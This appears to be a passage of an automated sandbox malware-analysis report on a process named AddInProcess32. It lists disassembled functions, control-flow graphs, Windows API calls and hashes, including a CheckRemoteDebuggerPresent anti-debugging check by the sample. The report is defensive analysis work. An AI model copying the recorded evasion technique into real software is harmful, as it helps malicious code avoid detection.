                                                                          • Source File: 0000000E.00000002.2559919163.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_6390000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: 60860229c91a13380341900520ad142550f750e9d4ef65e231b3f1543dd30a3a
                                                                          • Instruction ID: ad571055b671e2e3074c646477bc42eb2e89ba67ca862d9654ff0e5722b358dd
                                                                          • Opcode Fuzzy Hash: 60860229c91a13380341900520ad142550f750e9d4ef65e231b3f1543dd30a3a
                                                                          • Instruction Fuzzy Hash: 7E5135B4D003098FDB64CFAAD948BAEBBF1BB48314F208159E409A7350D734A944CFA5
                                                                          Function 0639A6E8 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 686 639a6e8-639a777 GetCurrentProcess 690 639a779-639a77f 686->690 691 639a780-639a7b4 GetCurrentThread 686->691 690->691 692 639a7bd-639a7f1 GetCurrentProcess 691->692 693 639a7b6-639a7bc 691->693 695 639a7fa-639a815 call 639a8b8 692->695 696 639a7f3-639a7f9 692->696 693->692 698 639a81b-639a84a GetCurrentThreadId 695->698 696->695 700 639a84c-639a852 698->700 701 639a853-639a8b5 698->701 700->701
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32 ref: 0639A766
                                                                          • GetCurrentThread.KERNEL32 ref: 0639A7A3
                                                                          • GetCurrentProcess.KERNEL32 ref: 0639A7E0
                                                                          • GetCurrentThreadId.KERNEL32 ref: 0639A839
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2559919163.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_6390000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: Current$ProcessThread
                                                                          • String ID:
                                                                          • API String ID: 2063062207-0
                                                                          • Opcode ID: c46f5bcdc27c5892740c3a9d375e8e6365d2adea95b2e70e51c9e86fd91a2f8a
                                                                          • Instruction ID: a0008992124a74bd6f7f8bb00bf95e87b6c823a00c8923a33cdc66d8bf146de1
                                                                          • Opcode Fuzzy Hash: c46f5bcdc27c5892740c3a9d375e8e6365d2adea95b2e70e51c9e86fd91a2f8a
                                                                          • Instruction Fuzzy Hash: 2A5144B4D003098FDB64CFAAD948BAEBBF1BB48314F208159E409A7360D734A944CFA5
                                                                          Function 0293706A Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1930 293706a-29370f4 CheckRemoteDebuggerPresent 1932 29370f6-29370fc 1930->1932 1933 29370fd-2937138 1930->1933 1932->1933
                                                                          APIs
                                                                          • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 029370E7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2552618466.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_2930000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: CheckDebuggerPresentRemote
                                                                          • String ID:
                                                                          • API String ID: 3662101638-0
                                                                          • Opcode ID: 7bf33643ffa5f47ce2a5ffaa91e31bdd14b3c267d9a8c63dffd0d5a2a7cc951a
                                                                          • Instruction ID: 2b3c3ad525ebb8bba875deb986ed577285c9cc0d0e04cf207468688579d4c52d
                                                                          • Opcode Fuzzy Hash: 7bf33643ffa5f47ce2a5ffaa91e31bdd14b3c267d9a8c63dffd0d5a2a7cc951a
                                                                          • Instruction Fuzzy Hash: 992178B2C01259CFDB14CFAAD484BEEFBF4EF48214F14842AE459A3240C7389945CF65
                                                                          Function 0639A928 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1942 639a928-639a9c4 DuplicateHandle 1943 639a9cd-639a9ea 1942->1943 1944 639a9c6-639a9cc 1942->1944 1944->1943
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0639A9B7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2559919163.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_6390000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 37dbbe0f64e2d4e915771cdcbdd5de361b4b3898cd37f71c4f7092f2a4a32c0a
                                                                          • Instruction ID: 7213e54f5806dd98310a9e8a0722d453cf7daa10ee500a9fc67c58d3b80de886
                                                                          • Opcode Fuzzy Hash: 37dbbe0f64e2d4e915771cdcbdd5de361b4b3898cd37f71c4f7092f2a4a32c0a
                                                                          • Instruction Fuzzy Hash: 092100B5C00208DFDB10CFAAD984AEEBBF4FB48310F14841AE918A3350C339A944CFA5
                                                                          Function 0639A930 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1947 639a930-639a9c4 DuplicateHandle 1948 639a9cd-639a9ea 1947->1948 1949 639a9c6-639a9cc 1947->1949 1949->1948
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0639A9B7
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2559919163.0000000006390000.00000040.00000800.00020000.00000000.sdmp, Offset: 06390000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_6390000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          • Opcode ID: 2e6088691b97830554048a0a3646c2dd512f34b3e7dbfb1e7cd188d4d1772e00
                                                                          • Instruction ID: aae0b58de25ce067993f3cb51e805528dec1fe5bc0b6ea8ea2334c7fe3c1a57f
                                                                          • Opcode Fuzzy Hash: 2e6088691b97830554048a0a3646c2dd512f34b3e7dbfb1e7cd188d4d1772e00
                                                                          • Instruction Fuzzy Hash: DB21E4B5D002489FDB10CFAAD984ADEBBF4FB48310F14841AE918A3350C375A944CFA5
                                                                          Function 010BD01C Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2552215830.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_10bd000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aa7f8ffa709c9f90187e95a879c5201c1aa339593dffe684c310ee956c44d31b
                                                                          • Instruction ID: e9a05d068b79e0fa8a68d734bb4ee4a5203e31f5bbcb0108640f3ac491922095
                                                                          • Opcode Fuzzy Hash: aa7f8ffa709c9f90187e95a879c5201c1aa339593dffe684c310ee956c44d31b
                                                                          • Instruction Fuzzy Hash: 74210371514300DFDB15DFA4D5C0B56FBA1EB84318F20C5ADE98A0B242C336D447CB61
                                                                          Function 010BD006 Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 0000000E.00000002.2552215830.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_14_2_10bd000_AddInProcess32.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2169ae53783e6a80d16d16c669b75315598f3801e65c75d6c86cca7f4e3dd85d
                                                                          • Instruction ID: 2906af2783c34aa55a1d7090b29d319a5bf986bcf29f4288286e1b6716857a81
                                                                          • Opcode Fuzzy Hash: 2169ae53783e6a80d16d16c669b75315598f3801e65c75d6c86cca7f4e3dd85d
                                                                          • Instruction Fuzzy Hash: 052141755083809FCB12CF64D994711BFB1EB46214F28C5DAD8898F6A7C33A9856CB62